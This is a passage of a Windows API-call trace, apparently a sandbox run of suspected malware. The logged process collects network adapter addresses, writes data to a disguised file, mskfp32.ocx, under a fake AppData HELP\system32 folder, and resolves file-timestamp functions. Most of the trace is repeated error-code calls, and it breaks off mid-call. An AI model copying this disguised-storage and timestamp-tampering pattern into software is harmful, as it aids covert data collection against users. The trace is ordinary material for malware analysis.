MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x312e58, cbMultiByte=12, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="192.168.0.34") returned 12 [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] lstrlenA (lpString="255.255.255.0") returned 13 [0051.571] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x312e68, cbMultiByte=13, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="255.255.255.0") returned 13 [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] lstrlenA (lpString="192.168.0.1") returned 11 [0051.571] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x312e80, cbMultiByte=11, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="192.168.0.1") returned 11 [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] lstrlenA (lpString="255.255.255.255") returned 15 [0051.571] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x312e90, cbMultiByte=15, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="255.255.255.255") returned 15 [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.571] GetLastError () returned 0x0 [0051.571] SetLastError (dwErrCode=0x0) [0051.572] lstrlenA (lpString="192.168.0.1") returned 11 [0051.572] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x312ea8, cbMultiByte=11, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="192.168.0.1") returned 11 [0051.572] GetLastError () returned 0x0 [0051.572] SetLastError (dwErrCode=0x0) [0051.572] lstrlenA (lpString="255.255.255.255") returned 15 [0051.572] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x312eb8, cbMultiByte=15, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="255.255.255.255") returned 15 [0051.572] GetLastError () returned 0x0 [0051.572] SetLastError (dwErrCode=0x0) [0051.572] GetLastError () returned 0x0 [0051.572] SetLastError (dwErrCode=0x0) [0051.572] GetPerAdapterInfo (in: IfIndex=0xa, pPerAdapterInfo=0x0, pOutBufLen=0x194f940 | out: pPerAdapterInfo=0x0, pOutBufLen=0x194f940) returned 0x6f [0051.731] GetPerAdapterInfo (in: IfIndex=0xa, pPerAdapterInfo=0x300d40, pOutBufLen=0x194f940 | out: pPerAdapterInfo=0x300d40, pOutBufLen=0x194f940) returned 0x0 [0051.738] GetLastError () returned 0x0 [0051.738] SetLastError (dwErrCode=0x0) [0051.738] lstrlenA (lpString="192.168.0.1") returned 11 [0051.738] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x300d50, cbMultiByte=11, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="192.168.0.1") returned 11 [0051.738] GetLastError () returned 0x0 [0051.738] SetLastError (dwErrCode=0x0) [0051.738] lstrlenA (lpString="255.255.255.255") returned 15 [0051.738] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x300d60, cbMultiByte=15, lpWideCharStr=0x194e474, cchWideChar=100 | out: lpWideCharStr="255.255.255.255") returned 15 [0051.738] GetLastError () returned 0x0 [0051.738] SetLastError (dwErrCode=0x0) [0051.738] GetLastError () returned 0x0 [0051.738] SetLastError (dwErrCode=0x0) [0051.738] GetLastError () returned 0x0 [0051.738] SetLastError (dwErrCode=0x0) [0051.738] lstrcatW (in: lpString1="\r\n2.1\r\n0\r\n\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n", lpString2="\r\n" | out: lpString1="\r\n2.1\r\n0\r\n\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\r\n") returned="\r\n2.1\r\n0\r\n\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\r\n" [0051.738] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0051.738] wsprintfA (in: param_1=0x302d3c, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0051.738] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\mskfp32.ocx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0051.738] GetTempFileNameA (in: lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpPrefixString="~DFBC", uUnique=0x0, lpTempFileName=0x72f1e850 | out: lpTempFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~DFBEBC.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~dfbebc.tmp")) returned 0xbebc [0051.739] wsprintfA (in: param_1=0x194f970, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~DFBEBC.tmp") returned 47 [0051.739] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0051.739] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0051.739] wsprintfW (in: param_1=0x194f830, param_2="%s\r\n\r\n" | out: param_1="\r\n\r\n") returned 50 [0051.739] lstrlenW (lpString="\r\n\r\n") returned 50 [0051.739] WriteFile (in: hFile=0x10c, lpBuffer=0x194f830*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x194f82c, lpOverlapped=0x0 | out: lpBuffer=0x194f830*, lpNumberOfBytesWritten=0x194f82c*=0x64, lpOverlapped=0x0) returned 1 [0051.740] lstrlenW (lpString="\r\n2.1\r\n0\r\n\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\n\r\n\r\r\n\r\n\r\n") returned 1683 [0051.740] WriteFile (in: hFile=0x10c, lpBuffer=0x30b380*, nNumberOfBytesToWrite=0xd26, lpNumberOfBytesWritten=0x194f958, lpOverlapped=0x0 | out: lpBuffer=0x30b380*, lpNumberOfBytesWritten=0x194f958*=0xd26, lpOverlapped=0x0) returned 1 [0051.740] wsprintfW (in: param_1=0x194f830, param_2="\r\n" | out: param_1="\r\n") returned 8 [0051.740] lstrlenW (lpString="\r\n") returned 8 [0051.740] WriteFile (in: hFile=0x10c, lpBuffer=0x194f830*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x194f82c, lpOverlapped=0x0 | out: lpBuffer=0x194f830*, lpNumberOfBytesWritten=0x194f82c*=0x10, lpOverlapped=0x0) returned 1 [0051.740] CloseHandle (hObject=0x10c) returned 1 [0051.741] GetLastError () returned 0x0 [0051.741] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0051.741] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0051.741] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0051.741] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileTime") returned 0x7620be16 [0051.742] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileTime") returned 0x76210f6f [0051.742] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.742] SetLastError (dwErrCode=0x0) [0051.742] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.743] GetLastError () returned 0x0 [0051.743] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.744] SetLastError (dwErrCode=0x0) [0051.744] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.745] SetLastError (dwErrCode=0x0) [0051.745] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.746] SetLastError (dwErrCode=0x0) [0051.746] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.747] SetLastError (dwErrCode=0x0) [0051.747] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.748] GetLastError () returned 0x0 [0051.748] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.749] GetLastError () returned 0x0 [0051.749] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.750] GetLastError () returned 0x0 [0051.750] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.751] SetLastError (dwErrCode=0x0) [0051.751] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.752] SetLastError (dwErrCode=0x0) [0051.752] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.753] GetLastError () returned 0x0 [0051.753] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.754] GetLastError () returned 0x0 [0051.754] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.755] SetLastError (dwErrCode=0x0) [0051.755] GetLastError () returned 0x0 [0051.756] SetLastError (dwErrCode=0x0) [0051.756] GetLastError () returned 0x0 [0051.756] SetLastError (dwErrCode=0x0) [0051.756] GetLastError () returned 0x0 [0051.756] SetLastError (dwErrCode=0x0) [0051.756] GetLastError () returned 0x0 [0051.756] SetLastError (dwErrCode=0x0) [0051.756] GetLastError () returned 0x0 [0051.756] SetLastError (dwErrCode=0x0) [0052.080] GetSystemDirectoryA (in: 